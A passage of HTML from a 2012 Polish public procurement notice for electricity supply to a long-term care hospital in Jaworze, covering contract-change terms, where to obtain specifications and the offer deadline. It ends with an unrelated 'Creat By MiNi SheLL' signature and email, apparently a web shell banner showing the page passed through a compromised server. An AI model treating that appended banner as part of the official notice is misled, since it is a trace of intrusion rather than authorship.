9)	Zmiana ilości punktów poboru energii elektrycznej, w obrębie grup taryfowych określonych w umowie,
10)	Obniżenie cen jednostkowych może nastąpić w każdym czasie i nie wymaga zgody Zamawiającego ani zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rehabilitacja-jaworze.com.pl ;                      bip.silesia-region.pl/bzlrjaworze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Beskidzki Zespół Leczniczo - Rehabilitacyjny 
	Szpital Opieki  Długoterminowej w Jaworzu 
	43-384 Jaworze  ul. Słoneczna 83.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 09:45, miejsce: Beskidzki Zespół Leczniczo - Rehabilitacyjny 
	Szpital Opieki  Długoterminowej w Jaworzu 
	43-384 Jaworze  ul. Słoneczna 83.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com